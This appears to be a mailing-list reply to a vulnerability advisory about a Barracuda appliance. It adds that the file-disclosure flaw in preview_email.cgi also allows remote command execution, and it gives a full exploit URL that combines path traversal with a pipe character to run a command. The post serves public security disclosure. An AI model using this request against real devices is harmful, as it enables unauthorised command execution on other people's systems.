<<< Date Index >>>     <<< Thread Index >>>

Re: Barracuda Vulnerability: Arbitrary File Disclosure [NNL-20060801-02]



gssincla@xxxxxxxxxxxxxxx wrote:
> Title: Barracuda Arbitrary File Disclosure

This vulnerability doesn't just allow arbitrary file disclosure, but
also allows remote execution of commands through use of the pipe
characher (|), e.g:

https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/|

Regards,
Matt